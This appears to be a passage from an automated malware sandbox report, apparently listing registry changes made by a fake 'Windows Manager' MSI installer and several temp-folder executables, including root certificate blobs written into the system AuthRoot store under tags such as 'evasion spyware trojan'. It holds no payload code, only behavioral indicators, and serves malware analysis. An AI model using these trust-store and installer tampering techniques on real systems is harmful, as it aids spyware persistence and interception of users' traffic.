01000000d08c9ddf0115d1118c7a00c04fc297eb010000000d327e8bcedb2d4b986abc323ea826ca00000000020000000000106600000001000020000000da9917b553f3f29502585c9478028b1b3e1e809e925379e52c0701dbca257635000000000e80000000020000200000005f0a080ad9e05cb875549e492de6da8dad51321554d3bb0578a63560e826e260f00400001c2ef996ea0b06b54230735145fea29b98a1afaa015b1d62fc47f15498dd77d18488249c0f31bfb6683fd150d3aadb69dfb0a2c643efd8eaf94906a53edde2d4e589bf263bbbb790a2e742261dd75e95b4816089be6b09c9332439f4b72262f8408bb3e2941d52b75b18f92f49d00a6bfc1cd0cbba9ba4a208f5eaa1372dbe601b5b185dfa8a94547f954cfa72637cfe3e23521fb7c01a061ef58491c9d693d752f54acd5998b3afa464881d56893f3c0d2aec2d6b8d3b2ce3b846f6a8e0049c6d854c0636f55bb3f5170f741a9af939903bc7feff708878a1b1cd82061698da668ddb3731b916bce1f649a9baf3d09919f723d18480b658ec4e622166a3983698ce82d332b579787e92a186ea8aa878b817942e37995993769f7c144a716a3410fafd10c7180486a2ed1479e0626ed721efaa5be38653041f582507a95da01209147ecdea8c21fb68a933046e6ccdd1e4c4752587b8678ac79197f580dcde50600f4d19e55b4ad6abbd65c1a6345be16021884d27bfce0746e2d1586e27ffd1081a4c2be63708ed993900d5334a917584abf71b31559d8fde074fadf90f667310fed3819fd6e1e16758e08e36fab324dbb2cd3b6347b8d4a96c301f9fe88af661a93c0c42c17c5bac80fc3243051512664206e4c48c9d66e73c74e8a800acbdba4e7e19c879d78b0983839d83460a3a5191cc4f3bdb136dc6ca074c64696ce011d1fe146eebfe69f4b3691d0e815570ab2bd202aea6d99ea1a5ec2f5299aa3113640996293ee047b4092338ad240bcdac6334f16ad925a10dcba5ec6274fdc120f3526ebbe10b788831606f0a55e3718f8d97958cdc413b57f161b504c84fc42fa9d4f03e9954e849f086c5a754a5c3ca3e36bc5c3db6aec9f3bafe9e06f0e06ba928ab5808bfa9a24c069323283d1b3ffbcb750b76e1e5d9a90248f3a42f3def87f93664fb5929f9a87e538e997de33984b2c2f7aa9e57931c010e6fbdab5303a3380d8fd3989307b2a32339e8b9ab638a3a1d62c0b5b7ad310cca1d51ad0b013f05ccb0b3f59209387bbcd4398c08e2aa126729cc6b79c4b85d88a503817a3177003eb3363310aa40b7bc2c8c03ebd8fa19967ededa0827fb19b1ddf6eb916ead573000ffb5f8a8fdbaef81cbd8d5367a8d8d5fb00c20e385bf8e798116e92a0d7ec9f4afc06633a73dee1334e0b584069ddea784a1968509f0026d0447a8fc60f0308bac344b54e2c3b3f97f2edf80cf9b654dc70e7ba9347c2dc31b9d7b3e2b8b1ee5f5848e2aac240cc7d02378c5b09cc1892919c83d310b590c3b17f17716f80cb99a26589bc7efc71f0f31461666f0c15376e6e6446ca2b75cc324f5097cd0d06cdcad1761df0c51e83ce27344d8091733183a92523bfbf712282f31df030eced4ba6e5dc5db9d9f35848dd90c656c928174ee2ddcc1fb6924ba4d5925d2e427046a9588ddceefc5c4d752d25ba08b00130ca588908c314fefcf32d4ba4b8d74c694e142e5c7bc34c6f42f664edf036b95df5f633ce25eab179737e69f4197ff73cbec54536ffcc9fc7e058ca6f623276a4d0dd0e91edca9aa91e885e91f68d20cf760484f9a7d64d43faa20ee001a1b42d33435078be01a5a4f3e19f98ff6f5a0d7f927a2adba9c58ce1667f1700b311bf1b39200ccfb0a53633cf06373ab4b1e1bdc4c31cdeb4f606728e45b8ac79fe001a4bacf7b6e474b58ebcc9abd1a9f7a3a38d0158ee8ab23415ef52371f39533469be680a4d2609b75b920d772d22e4d6cd31868d936cc023c84c640000000473abe70ca3fad744f7f35760fed967553b6a66c7d8b6fd0f62d796a6b80d337264fc39201da8c8f4ee68a02764f43a681f94710569019b2f85fc1d740c20bcd C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000\Software\Microsoft\Internet Explorer\IntelliForms C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000\Software\Microsoft\Internet Explorer\Main C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\LowMic C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000\Software\Microsoft\Internet Explorer\Zoom C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0" C:\Program Files\Internet Explorer\iexplore.exe N/A

Modifies data under HKEY_USERS

Description Indicator Process Target
Key deleted \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E C:\Windows\system32\msiexec.exe N/A
Key deleted \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25 C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\26 C:\Windows\system32\msiexec.exe N/A

Modifies registry class

Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C414548CC3098124D97E31A29BF7FD26\AuthorizedLUAApp = "0" C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\UpgradeCodes\5785CBDF4ABB5AD409841A692AF14EA9\C414548CC3098124D97E31A29BF7FD26 C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C414548CC3098124D97E31A29BF7FD26\SourceList\Net\1 = "C:\\Users\\Admin\\AppData\\Roaming\\AW Manager\\Windows Manager 1.0.0\\install\\97FDF62\\" C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C414548CC3098124D97E31A29BF7FD26\SourceList\LastUsedSource = "n;1;C:\\Users\\Admin\\AppData\\Roaming\\AW Manager\\Windows Manager 1.0.0\\install\\97FDF62\\" C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\C414548CC3098124D97E31A29BF7FD26 C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C414548CC3098124D97E31A29BF7FD26\PackageCode = "6BBF4B2F4524B25478C17BFBEE2559F7" C:\Windows\system32\msiexec.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C414548CC3098124D97E31A29BF7FD26\Language = "1033" C:\Windows\system32\msiexec.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C414548CC3098124D97E31A29BF7FD26\InstanceType = "0" C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C414548CC3098124D97E31A29BF7FD26\ProductName = "Windows Manager" C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C414548CC3098124D97E31A29BF7FD26\ProductIcon = "C:\\Windows\\Installer\\{C845414C-903C-4218-9DE7-132AB97FDF62}\\logo.exe" C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C414548CC3098124D97E31A29BF7FD26\SourceList\Media\DiskPrompt = "[1]" C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\UpgradeCodes\5785CBDF4ABB5AD409841A692AF14EA9 C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C414548CC3098124D97E31A29BF7FD26\SourceList C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C414548CC3098124D97E31A29BF7FD26\SourceList\Media\1 = ";" C:\Windows\system32\msiexec.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C414548CC3098124D97E31A29BF7FD26\Version = "16777216" C:\Windows\system32\msiexec.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C414548CC3098124D97E31A29BF7FD26\Assignment = "1" C:\Windows\system32\msiexec.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C414548CC3098124D97E31A29BF7FD26\AdvertiseFlags = "388" C:\Windows\system32\msiexec.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C414548CC3098124D97E31A29BF7FD26\DeploymentFlags = "3" C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C414548CC3098124D97E31A29BF7FD26\SourceList\Media C:\Windows\system32\msiexec.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C414548CC3098124D97E31A29BF7FD26\Clients = 3a0000000000 C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\C414548CC3098124D97E31A29BF7FD26\MainFeature C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C414548CC3098124D97E31A29BF7FD26 C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C414548CC3098124D97E31A29BF7FD26\SourceList\PackageName = "Windows Manager - Postback Y.msi" C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C414548CC3098124D97E31A29BF7FD26\SourceList\Net C:\Windows\system32\msiexec.exe N/A

Modifies system certificate store

evasion spyware trojan
Description Indicator Process Target
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 040000000100000010000000497904b0eb8719ac47b0bc11519b74d00f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030853000000010000002600000030243022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c00b00000001000000180000004300b7004f00b7004d00b7004f00b7004400b7004f000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e C:\Users\Admin\AppData\Local\Temp\7zS0D696124\Sat19e6a852f849bb2.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43 C:\Users\Admin\AppData\Local\Temp\uugw3lq1.b1o\anyname.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 0f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa6090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030814000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f0b00000001000000120000004400690067006900430065007200740000001d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d432000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8adc9f0a0c83177a8f90ac8ae779535c31842af60f98323676ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e987d0325aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2ee650b2a7fa0a452fa2f0f2 C:\Users\Admin\AppData\Local\Temp\uugw3lq1.b1o\anyname.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 190000000100000010000000ba4f3972e7aed9dccdc210db59da13c90300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc251d00000001000000100000008f76b981d528ad4770088245e2031b630b0000000100000012000000440069006700690043006500720074000000140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc35300000001000000230000003021301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703080f0000000100000014000000e35ef08d884f0a0ade2f75e96301ce6230f213a82000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a C:\Users\Admin\AppData\Local\Temp\jaoqpigf.zbc\installer.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 04000000010000001000000087ce0b7b2a0e4900e158719b37a893720f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa6090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030814000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f0b00000001000000120000004400690067006900430065007200740000001d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d43190000000100000010000000749966cecc95c1874194ca7203f9b6202000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8adc9f0a0c83177a8f90ac8ae779535c31842af60f98323676ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e987d0325aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2ee650b2a7fa0a452fa2f0f2 C:\Users\Admin\AppData\Local\Temp\jaoqpigf.zbc\installer.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\A8985D3A65E5E5C4B2D7D66D40C6DD2FB19C5436\Blob = 04000000010000001000000079e4a9840d7d3a96d7c04fe2434c892e0f0000000100000014000000b34ddd372ed92e8f2abfbb9e20a9d31f204f194b090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030814000000010000001400000003de503556d14cbb66f0a3e21b1bc397b23dd1550b00000001000000120000004400690067006900430065007200740000001d000000010000001000000059779e39e21a2e3dfced6857ed5c5fd9030000000100000014000000a8985d3a65e5e5c4b2d7d66d40c6dd2fb19c54361900000001000000100000000f3a0527d242de2dc98e5cfcb1e991ee2000000001000000b3030000308203af30820297a0030201020210083be056904246b1a1756ac95991c74a300d06092a864886f70d01010505003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100e23be11172dea8a4d3a357aa50a28f0b7790c9a2a5ee12ce965b010920cc0193a74e30b753f743c46900579de28d22dd870640008109cece1b83bfdfcd3b7146e2d666c705b37627168f7b9e1e957deeb748a308dad6af7a0c3906657f4a5d1fbc17f8abbeee28d7747f7a78995985686e5c23324bbf4ec0e85a6de370bf7710bffc01f685d9a844105832a97518d5d1a2be47e2276af49a33f84908608bd45fb43a84bfa1aa4a4c7d3ecf4f5f6c765ea04b37919edc22e66dce141a8e6acbfecdb3146417c75b299e32bff2eefad30b42d4abb74132da0cd4eff881d5bb8d583fb51be84928a270da3104ddf7b216f24c0a4e07a8ed4a3d5eb57fa390c3af270203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041403de503556d14cbb66f0a3e21b1bc397b23dd155301f0603551d2304183016801403de503556d14cbb66f0a3e21b1bc397b23dd155300d06092a864886f70d01010505000382010100cb9c37aa4813120afadd449c4f52b0f4dfae04f5797908a32418fc4b2b84c02db9d5c7fef4c11f58cbb86d9c7a74e79829ab11b5e370a0a1cd4c8899938c9170e2ab0f1cbe93a9ff63d5e40760d3a3bf9d5b09f1d58ee353f48e63fa3fa7dbb466df6266d6d16e418df22db5ea774a9f9d58e22b59c04023ed2d2882453e7954922698e08048a837eff0d6796016deace80ecd6eac4417382f49dae1453e2ab93653cf3a5006f72ee8c457496c612118d504ad783c2c3a806ba7ebaf1514e9d889c1b9386ce2916c8aff64b977255730c01b24a3e1dce9df477cb5b424080530ec2dbd0bbf45bf50b9a9f3eb980112adc888c698345f8d0a3cc6e9d595956dde C:\Users\Admin\AppData\Local\Temp\7zS0D696124\Sat196ac06a9e6.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 C:\Users\Admin\AppData\Local\Temp\7zS0D696124\Sat19e6a852f849bb2.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25 C:\Users\Admin\AppData\Local\Temp\jaoqpigf.zbc\installer.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 0f0000000100000014000000e35ef08d884f0a0ade2f75e96301ce6230f213a8090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703085300000001000000230000003021301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc30b00000001000000120000004400690067006900430065007200740000001d00000001000000100000008f76b981d528ad4770088245e2031b630300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc252000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a C:\Users\Admin\AppData\Local\Temp\jaoqpigf.zbc\installer.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43 C:\Users\Admin\AppData\Local\Temp\jaoqpigf.zbc\installer.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\A8985D3A65E5E5C4B2D7D66D40C6DD2FB19C5436 C:\Users\Admin\AppData\Local\Temp\7zS0D696124\Sat196ac06a9e6.exe N/A
